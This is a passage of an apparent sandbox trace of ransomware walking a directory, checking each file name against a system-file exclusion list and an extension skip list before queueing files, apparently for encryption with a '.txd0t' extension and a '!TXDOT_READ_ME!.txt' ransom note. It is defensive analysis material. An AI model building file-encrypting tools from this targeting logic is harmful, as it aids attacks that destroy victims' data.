psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0087.725] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="sqmapi.dll", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\sqmapi.dll") returned="C:\\588bce7c90097ed212\\sqmapi.dll" [0087.725] PathFindExtensionW (pszPath="sqmapi.dll") returned=".dll" [0087.725] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0087.725] StrCmpIW (psz1="sqmapi.dll", psz2="bootsect.bak") returned 1 [0087.725] StrCmpIW (psz1="sqmapi.dll", psz2="iconcache.db") returned 1 [0087.726] StrCmpIW (psz1="sqmapi.dll", psz2="thumbs.db") returned -1 [0087.726] StrCmpIW (psz1="sqmapi.dll", psz2=" ransomware ") returned 1 [0087.726] StrCmpIW (psz1="sqmapi.dll", psz2=" ransom ") returned 1 [0087.726] StrCmpIW (psz1="sqmapi.dll", psz2="debug.txt") returned 1 [0087.726] StrCmpIW (psz1="sqmapi.dll", psz2="boot.ini") returned 1 [0087.726] StrCmpIW (psz1="sqmapi.dll", psz2="desktop.ini") returned 1 [0087.726] StrCmpIW (psz1="sqmapi.dll", psz2="autorun.inf") returned 1 [0087.726] StrCmpIW (psz1="sqmapi.dll", psz2="ntuser.dat") returned 1 [0087.726] StrCmpIW (psz1="sqmapi.dll", psz2="ntldr") returned 1 [0087.726] StrCmpIW (psz1="sqmapi.dll", psz2="ntdetect.com") returned 1 [0087.726] StrCmpIW (psz1="sqmapi.dll", psz2="bootfont.bin") returned 1 [0087.726] StrCmpIW (psz1="sqmapi.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.726] PathFindExtensionW (pszPath="sqmapi.dll") returned=".dll" [0087.726] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0087.726] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x3704, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Strings.xml", cAlternateFileName="")) returned 1 [0087.726] StrCmpW (psz1="Strings.xml", psz2=".") returned 1 [0087.726] StrCmpW (psz1="Strings.xml", psz2="..") returned 1 [0087.726] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0087.726] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0087.726] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Strings.xml", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Strings.xml") returned="C:\\588bce7c90097ed212\\Strings.xml" [0087.726] PathFindExtensionW (pszPath="Strings.xml") returned=".xml" [0087.726] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0087.726] StrCmpIW (psz1="Strings.xml", psz2="bootsect.bak") returned 1 [0087.726] StrCmpIW (psz1="Strings.xml", psz2="iconcache.db") returned 1 [0087.726] StrCmpIW (psz1="Strings.xml", psz2="thumbs.db") returned -1 [0087.726] StrCmpIW (psz1="Strings.xml", psz2=" ransomware ") returned 1 [0087.726] StrCmpIW (psz1="Strings.xml", psz2=" ransom ") returned 1 [0087.726] StrCmpIW (psz1="Strings.xml", psz2="debug.txt") returned 1 [0087.726] StrCmpIW (psz1="Strings.xml", psz2="boot.ini") returned 1 [0087.726] StrCmpIW (psz1="Strings.xml", psz2="desktop.ini") returned 1 [0087.726] StrCmpIW (psz1="Strings.xml", psz2="autorun.inf") returned 1 [0087.726] StrCmpIW (psz1="Strings.xml", psz2="ntuser.dat") returned 1 [0087.727] StrCmpIW (psz1="Strings.xml", psz2="ntldr") returned 1 [0087.727] StrCmpIW (psz1="Strings.xml", psz2="ntdetect.com") returned 1 [0087.727] StrCmpIW (psz1="Strings.xml", psz2="bootfont.bin") returned 1 [0087.727] StrCmpIW (psz1="Strings.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.727] PathFindExtensionW (pszPath="Strings.xml") returned=".xml" [0087.727] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0087.727] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0087.739] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0087.739] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\Strings.xml", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml" [0087.739] SetEvent (hEvent=0x3fc) returned 1 [0087.739] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x97f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0087.740] StrCmpW (psz1="UiInfo.xml", psz2=".") returned 1 [0087.740] StrCmpW (psz1="UiInfo.xml", psz2="..") returned 1 [0087.740] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0087.740] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0087.740] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="UiInfo.xml", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\UiInfo.xml") returned="C:\\588bce7c90097ed212\\UiInfo.xml" [0087.740] PathFindExtensionW (pszPath="UiInfo.xml") returned=".xml" [0087.740] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0087.740] StrCmpIW (psz1="UiInfo.xml", psz2="bootsect.bak") returned 1 [0087.740] StrCmpIW (psz1="UiInfo.xml", psz2="iconcache.db") returned 1 [0087.740] StrCmpIW (psz1="UiInfo.xml", psz2="thumbs.db") returned 1 [0087.740] StrCmpIW (psz1="UiInfo.xml", psz2=" ransomware ") returned 1 [0087.740] StrCmpIW (psz1="UiInfo.xml", psz2=" ransom ") returned 1 [0087.740] StrCmpIW (psz1="UiInfo.xml", psz2="debug.txt") returned 1 [0087.740] StrCmpIW (psz1="UiInfo.xml", psz2="boot.ini") returned 1 [0087.740] StrCmpIW (psz1="UiInfo.xml", psz2="desktop.ini") returned 1 [0087.740] StrCmpIW (psz1="UiInfo.xml", psz2="autorun.inf") returned 1 [0087.740] StrCmpIW (psz1="UiInfo.xml", psz2="ntuser.dat") returned 1 [0087.740] StrCmpIW (psz1="UiInfo.xml", psz2="ntldr") returned 1 [0087.740] StrCmpIW (psz1="UiInfo.xml", psz2="ntdetect.com") returned 1 [0087.740] StrCmpIW (psz1="UiInfo.xml", psz2="bootfont.bin") returned 1 [0087.740] StrCmpIW (psz1="UiInfo.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.740] PathFindExtensionW (pszPath="UiInfo.xml") returned=".xml" [0087.740] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0087.740] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0087.744] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0087.744] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\UiInfo.xml", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml" [0087.744] SetEvent (hEvent=0x408) returned 1 [0087.744] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x87910600, ftCreationTime.dwHighDateTime=0x1ca2a27, ftLastAccessTime.dwLowDateTime=0x87910600, ftLastAccessTime.dwHighDateTime=0x1ca2a27, ftLastWriteTime.dwLowDateTime=0x87910600, ftLastWriteTime.dwHighDateTime=0x1ca2a27, nFileSizeHigh=0x0, nFileSizeLow=0x19688, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="watermark.bmp", cAlternateFileName="WATERM~1.BMP")) returned 1 [0087.744] StrCmpW (psz1="watermark.bmp", psz2=".") returned 1 [0087.744] StrCmpW (psz1="watermark.bmp", psz2="..") returned 1 [0087.744] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0087.744] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0087.744] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="watermark.bmp", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\watermark.bmp") returned="C:\\588bce7c90097ed212\\watermark.bmp" [0087.744] PathFindExtensionW (pszPath="watermark.bmp") returned=".bmp" [0087.744] StrCmpW (psz1=".bmp", psz2=".txd0t") returned -1 [0087.744] StrCmpIW (psz1="watermark.bmp", psz2="bootsect.bak") returned 1 [0087.744] StrCmpIW (psz1="watermark.bmp", psz2="iconcache.db") returned 1 [0087.744] StrCmpIW (psz1="watermark.bmp", psz2="thumbs.db") returned 1 [0087.744] StrCmpIW (psz1="watermark.bmp", psz2=" ransomware ") returned 1 [0087.744] StrCmpIW (psz1="watermark.bmp", psz2=" ransom ") returned 1 [0087.744] StrCmpIW (psz1="watermark.bmp", psz2="debug.txt") returned 1 [0087.744] StrCmpIW (psz1="watermark.bmp", psz2="boot.ini") returned 1 [0087.744] StrCmpIW (psz1="watermark.bmp", psz2="desktop.ini") returned 1 [0087.744] StrCmpIW (psz1="watermark.bmp", psz2="autorun.inf") returned 1 [0087.744] StrCmpIW (psz1="watermark.bmp", psz2="ntuser.dat") returned 1 [0087.744] StrCmpIW (psz1="watermark.bmp", psz2="ntldr") returned 1 [0087.744] StrCmpIW (psz1="watermark.bmp", psz2="ntdetect.com") returned 1 [0087.744] StrCmpIW (psz1="watermark.bmp", psz2="bootfont.bin") returned 1 [0087.744] StrCmpIW (psz1="watermark.bmp", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.745] PathFindExtensionW (pszPath="watermark.bmp") returned=".bmp" [0087.745] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".bmp") returned 0x0 [0087.745] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0087.757] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0087.757] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\watermark.bmp", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp") returned="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp" [0087.757] SetEvent (hEvent=0x418) returned 1 [0087.757] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2120bc00, ftCreationTime.dwHighDateTime=0x1cac6c9, ftLastAccessTime.dwLowDateTime=0x2120bc00, ftLastAccessTime.dwHighDateTime=0x1cac6c9, ftLastWriteTime.dwLowDateTime=0x2120bc00, ftLastWriteTime.dwHighDateTime=0x1cac6c9, nFileSizeHigh=0x0, nFileSizeLow=0x4f5113, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Windows6.0-KB956250-v6001-x64.msu", cAlternateFileName="WINDOW~1.MSU")) returned 1 [0087.757] StrCmpW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2=".") returned 1 [0087.757] StrCmpW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="..") returned 1 [0087.757] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0087.758] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0087.758] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Windows6.0-KB956250-v6001-x64.msu", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu" [0087.758] PathFindExtensionW (pszPath="Windows6.0-KB956250-v6001-x64.msu") returned=".msu" [0087.758] StrCmpW (psz1=".msu", psz2=".txd0t") returned -1 [0087.758] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="bootsect.bak") returned 1 [0087.758] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="iconcache.db") returned 1 [0087.758] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="thumbs.db") returned 1 [0087.758] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2=" ransomware ") returned 1 [0087.758] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2=" ransom ") returned 1 [0087.758] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="debug.txt") returned 1 [0087.758] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="boot.ini") returned 1 [0087.758] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="desktop.ini") returned 1 [0087.758] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="autorun.inf") returned 1 [0087.758] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="ntuser.dat") returned 1 [0087.758] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="ntldr") returned 1 [0087.758] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="ntdetect.com") returned 1 [0087.758] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="bootfont.bin") returned 1 [0087.758] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.758] PathFindExtensionW (pszPath="Windows6.0-KB956250-v6001-x64.msu") returned=".msu" [0087.758] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".msu") returned=".msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0087.758] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x1bbe7400, ftCreationTime.dwHighDateTime=0x1cac6bf, ftLastAccessTime.dwLowDateTime=0x1bbe7400, ftLastAccessTime.dwHighDateTime=0x1cac6bf, ftLastWriteTime.dwLowDateTime=0x1bbe7400, ftLastWriteTime.dwHighDateTime=0x1cac6bf, nFileSizeHigh=0x0, nFileSizeLow=0x217520, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Windows6.0-KB956250-v6001-x86.msu", cAlternateFileName="WINDOW~2.MSU")) returned 1 [0087.758] StrCmpW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2=".") returned 1 [0087.758] StrCmpW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="..") returned 1 [0087.758] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0087.758] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0087.758] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Windows6.0-KB956250-v6001-x86.msu", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu" [0087.758] PathFindExtensionW (pszPath="Windows6.0-KB956250-v6001-x86.msu") returned=".msu" [0087.758] StrCmpW (psz1=".msu", psz2=".txd0t") returned -1 [0087.758] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="bootsect.bak") returned 1 [0087.758] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="iconcache.db") returned 1 [0087.758] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="thumbs.db") returned 1 [0087.758] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2=" ransomware ") returned 1 [0087.759] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2=" ransom ") returned 1 [0087.759] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="debug.txt") returned 1 [0087.759] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="boot.ini") returned 1 [0087.759] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="desktop.ini") returned 1 [0087.759] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="autorun.inf") returned 1 [0087.759] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="ntuser.dat") returned 1 [0087.759] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="ntldr") returned 1 [0087.759] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="ntdetect.com") returned 1 [0087.759] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="bootfont.bin") returned 1 [0087.759] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.759] PathFindExtensionW (pszPath="Windows6.0-KB956250-v6001-x86.msu") returned=".msu" [0087.759] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".msu") returned=".msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0087.759] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8e5700, ftCreationTime.dwHighDateTime=0x1cac6d1, ftLastAccessTime.dwLowDateTime=0x5b8e5700, ftLastAccessTime.dwHighDateTime=0x1cac6d1, ftLastWriteTime.dwLowDateTime=0x5b8e5700, ftLastWriteTime.dwHighDateTime=0x1cac6d1, nFileSizeHigh=0x0, nFileSizeLow=0x4db1ce, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Windows6.1-KB958488-v6001-x64.msu", cAlternateFileName="WINDOW~3.MSU")) returned 1 [0087.759] StrCmpW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2=".") returned 1 [0087.759] StrCmpW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="..") returned 1 [0087.759] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0087.759] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0087.759] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Windows6.1-KB958488-v6001-x64.msu", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu" [0087.759] PathFindExtensionW (pszPath="Windows6.1-KB958488-v6001-x64.msu") returned=".msu" [0087.759] StrCmpW (psz1=".msu", psz2=".txd0t") returned -1 [0087.759] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="bootsect.bak") returned 1 [0087.759] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="iconcache.db") returned 1 [0087.759] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="thumbs.db") returned 1 [0087.759] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2=" ransomware ") returned 1 [0087.759] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2=" ransom ") returned 1 [0087.759] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="debug.txt") returned 1 [0087.759] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="boot.ini") returned 1 [0087.759] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="desktop.ini") returned 1 [0087.759] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="autorun.inf") returned 1 [0087.759] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="ntuser.dat") returned 1 [0087.759] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="ntldr") returned 1 [0087.759] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="ntdetect.com") returned 1 [0087.759] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="bootfont.bin") returned 1 [0087.759] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.759] PathFindExtensionW (pszPath="Windows6.1-KB958488-v6001-x64.msu") returned=".msu" [0087.760] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".msu") returned=".msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0087.760] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0xd0ac5d00, ftLastWriteTime.dwHighDateTime=0x1cac6ce, nFileSizeHigh=0x0, nFileSizeLow=0x20acf9, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Windows6.1-KB958488-v6001-x86.msu", cAlternateFileName="WINDOW~4.MSU")) returned 1 [0087.760] StrCmpW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2=".") returned 1 [0087.760] StrCmpW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="..") returned 1 [0087.760] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0087.760] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0087.760] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Windows6.1-KB958488-v6001-x86.msu", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu" [0087.760] PathFindExtensionW (pszPath="Windows6.1-KB958488-v6001-x86.msu") returned=".msu" [0087.760] StrCmpW (psz1=".msu", psz2=".txd0t") returned -1 [0087.760] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="bootsect.bak") returned 1 [0087.760] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="iconcache.db") returned 1 [0087.760] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="thumbs.db") returned 1 [0087.760] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2=" ransomware ") returned 1 [0087.760] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2=" ransom ") returned 1 [0087.760] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="debug.txt") returned 1 [0087.760] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="boot.ini") returned 1 [0087.760] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="desktop.ini") returned 1 [0087.760] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="autorun.inf") returned 1 [0087.760] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="ntuser.dat") returned 1 [0087.760] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="ntldr") returned 1 [0087.760] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="ntdetect.com") returned 1 [0087.760] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="bootfont.bin") returned 1 [0087.760] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.760] PathFindExtensionW (pszPath="Windows6.1-KB958488-v6001-x86.msu") returned=".msu" [0087.760] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".msu") returned=".msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0087.760] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, 